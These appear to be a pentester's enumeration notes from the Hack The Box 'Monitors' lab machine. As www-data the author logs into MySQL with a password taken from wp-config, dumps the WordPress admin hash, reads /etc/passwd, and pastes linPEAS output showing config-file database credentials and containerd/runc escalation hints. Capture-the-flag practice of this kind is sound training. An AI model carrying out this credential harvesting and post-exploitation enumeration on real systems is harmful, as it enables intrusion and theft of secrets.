6 box enum www-data

www-data@monitors:/usr/share/cacti$ mysql -u wpadmin -p
Enter password: BestAdministrator@2020!
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.00 sec)

mysql> select user_login,user_pass, user_email from wp_users;
+------------+------------------------------------+-------------------+
| user_login | user_pass                          | user_email        |
+------------+------------------------------------+-------------------+
| admin      | $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 | admin@monitor.htb |
+------------+------------------------------------+-------------------+
# we know admin pass; no need to crack

# checking the folder name, I tried so much,
www-data@monitors:/usr/share/cacti$ cd /var/www
www-data@monitors:/var/www$ ls -la
total 12
drwxr-xr-x  3 root     root     4096 Nov 10  2020 .
drwxr-xr-x 15 root     root     4096 Nov 10  2020 ..
drwxr-xr-x  5 www-data www-data 4096 Apr 21 20:19 wordpress

www-data@monitors:/var/www/wordpress$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

had issues transferring files, no wget, curl used __curl bash function

PEAS

# processes
root       1343  0.0  1.1 978804 48124 ?        Ssl  19:07   0:00 /usr/bin/containerd
root       2113  0.0  0.1 110228  5660 ?        Sl   19:07   0:00  _ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/d76094c5f30c08c24b23d78c5895d61ea5262ce4095f76efa04031a2502c3be5 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root       2138  0.1  2.0 3410072 83344 ?       Ssl  19:07   0:05      _ /usr/local/openjdk-8/bin/java -Dorg.gradle.appname=gradlew -classpath /usr/src/apache-ofbiz-17.12.01/gradle/wrapper/gradle-wrapper.jar org.gradle.wrapper.GradleWrapperMain --offline ofbiz
root       1660  0.0  2.0 1344420 82372 ?       Ssl  19:07   0:02 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock


╣ Interfaces
br-968a1c1855aa: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        ether 02:42:c5:ff:fb:68  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
		
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::42:c1ff:fe0b:d224  prefixlen 64  scopeid 0x20<link>
        ether 02:42:c1:0b:d2:24  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5  bytes 446 (446.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
		
veth67dfbca: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::b401:24ff:fe71:571a  prefixlen 64  scopeid 0x20<link>
        ether b6:01:24:71:57:1a  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 21  bytes 1662 (1.6 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
		
╣ Active Ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -

╣ Users with console
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
root:x:0:0:root:/root:/bin/bash

╣ PHP exec extensions
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-enabled/cacti-admin.monitors.htb.conf
/etc/apache2/sites-enabled/monitors.htb.conf

╣ Analyzing Wordpress Files (limit 70)
-rwxr-xr-x 1 www-data www-data 3117 Oct 15  2020 /var/www/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
define( 'DB_HOST', 'localhost' );

-rw-r--r-- 1 998 998 361 Nov 11  2020 /srv/gitlab/data/.gitconfig


╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"

╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/bin/runc, you may be able to escalate privileges with it

-rw-r--r-- 1 root root 5140 Nov 10  2020 /usr/share/cacti/cacti/include/config.php
-rw-r--r-- 1 www-data www-data 5144 May  3  2020 /usr/share/cacti/cacti/include/config.php.dist
$database_type     = 'mysql';
$database_default  = 'cacti';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port     = '3306';
$database_type     = 'mysql';
$database_default  = 'cacti';
$database_username = 'cacti';
$database_password = 'cactipass';
$database_port     = '3306';

Last updated